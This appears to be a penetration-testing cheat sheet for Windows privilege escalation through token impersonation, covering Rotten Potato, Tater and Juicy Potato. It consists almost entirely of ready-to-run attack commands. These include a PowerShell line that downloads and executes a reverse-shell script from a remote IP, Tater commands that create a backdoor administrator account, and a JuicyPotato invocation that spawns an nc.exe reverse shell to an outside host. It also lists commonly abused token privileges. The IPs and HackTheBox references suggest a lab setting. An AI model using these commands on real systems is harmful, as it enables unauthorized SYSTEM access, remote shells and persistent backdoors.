Potatos and Tokens
Rotten Potato
How the Exploit Works:
Binary available at
Using Metasploit
# metasploit
getuid
getprivs
use incognito
list_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate_token "NT AUTHORITY\SYSTEM"
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
Using Tater.ps1
Usage:
# To import with Import-Module:
Import-Module ./Tater.ps1
# To import using dot source method:
. ./Tater.ps1
Examples:
# Basic trigger 1 example
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
# Basic trigger 2 example
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
# Basic trigger 3 example - 2 steps
# Two system setup to get around port 80 being in-use on the privesc target
# WPAD System - 192.168.10.100 - this system will just serve up a wpad.dat file that will direct HTTP traffic on the privesc target to the non-80 HTTP port
Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"
# Privesc Target - 192.168.10.101
Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100
Tokens and Descriptions
Most commonly abused tokens
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
Juicy Potato
Watch ippsec video on Tally
JuicyPotato.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.10 1234"
https://github.com/decoder-it/juicy-potato
T:\>JuicyPotato.exe
JuicyPotato v0.1
Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
CLSID
http://ohpe.it/juicy-potato/CLSID/

Picture Source: https://snowscan.io/htb-writeup-ethereal/#
Last updated